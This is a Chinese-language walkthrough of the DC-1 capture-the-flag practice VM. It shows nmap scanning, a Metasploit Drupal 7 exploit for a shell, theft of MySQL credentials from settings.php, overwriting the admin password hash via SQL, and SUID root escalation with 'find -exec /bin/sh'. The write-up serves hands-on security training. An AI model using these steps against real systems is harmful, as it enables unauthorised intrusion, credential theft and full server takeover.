DC-1靶机渗透

环境搭建
1.1 下载 DC-1.ova（Open Virtualization Appliance：开放虚拟化设备）http://www.five86.com/downloads/DC-1.zip
1.2 在VMware中新建一个虚拟机，类型选debian，网络选择一定要和渗透机保持一致（建议都选NAT）其余都按默认设置即可
1.3 打开DC-1虚拟机，显示如下即表示安装成功
开始渗透
2.1 打开kali虚拟机，首先ifconfig查看自己当前网段

2.2 用nmap对同网段存活主机及端口进行探查并验证为DC-1靶机
namp -sP 192.168.xxx.0/24
得到当前网段中存活的主机，逐一对其进行端口探查：
nmap -sV -p- 192.168.xxx.xxx
发现一个主机只开启了22、80、111、49528端口，非常可疑

在浏览器中访问该地址

确定为靶机，并了解到架构为Drupal。

2.3 使用msf进行攻击
msfconsole #启动msf
search drupal 7 #搜索漏洞

逐个对rank为excellent的漏洞使用（高危漏洞）
use 1 #使用编号为1的漏洞进行攻击
set rhosts 192.168.xxx.xxx #设置目的ip
run #开始运行

显示如上页面则攻击成功
输入shell进行反弹shell
如果想要美观一点
python -c 'import pty;pty.spawn("/bin/bash")'
ls后获取当前目录得到

每一个flag都是对获得下一个flag的提示
cat flag1.txt #获得第一个flag

翻译：每个好的CMS都需要一个配置文件，你也需要一个配置文件。
根据提示进入drupal系统的配置页面：
cd /var/www/sites/default
cat settings.php

得到flag2：蛮力和字典攻击不是获得访问的唯一方法(你将需要访问)。你可以使用这些凭据做什么？
获取的是mysql的用户名和密码，尝试登录
mysql -udbuser -pR0ck3t
登录成功，打印数据库
show databases;

进入drupaldb数据库中并打印所有表
use drupaldb
show tables;

发现用户表，查看信息
select * from users;

发现有管理员账号密码，但是这个密码的加密方式不了解，用kali的hashid探查一下：

发现是drupal 7的自带加密方式。这里有两个选择
1、下载drupal源码，对其进行代码审计，了解加密方式并反解码。
2、直接更换数据库中的密码（我选这个，太菜了看不懂源码）

这也是官方给出的解决方案
exit退出mysql命令行
compgen -c #查看当前可用命令
发现find可用，寻找一下带有pass的文件
find / -name "*pass*"

发现确实存在这个文件，那么接下来对代码进行重置
./scripts/password-hash.sh 111111
重新进入数据库命令行，输入
update drupaldb.users set pass = '$S$DS957yEMh0ITgmDWE9wnDnagWSbTsjgNKrUOswR8.HogXjfdykeG' where name = 'admin';

显示ok则修改成功
去浏览器进行登录看看

登录成功，并在content页面找到了flag3

翻译：特殊的 perms 会帮助你找到通行证，但是你需要执行 -exec 这个命令才能弄清楚如何在 shadow 中得到什么。
接下来根据上一步提示来获取 root 权限（SUID提权）
find flag1.txt -exec whoami \; #查看创建 flag1.txt 文件用户的权限
find flag1.txt -exec '/bin/sh' \; #使用 find 以 flag1.txt 创建者身份回弹 shell

获得root权限，直接find所有含有flag的文件
find / -name "*flag*"

获得flag4.txt 和 thefinalflag.txt（看来跳了一步呀）

翻译：是否可以使用相同的方法查找或访问根中的标志？可能吧。但也许没那么容易还是很容易？
坏了，看来首先应该进入的是flag4用户。问题不大，和root的过程类似的。直接看最终flag吧

干得漂亮！
希望你已经享受了这一切，并学到了一些新的技巧。你可以通过 twitter -@DCAU7 联系我，让我知道你对这段小旅程的看法。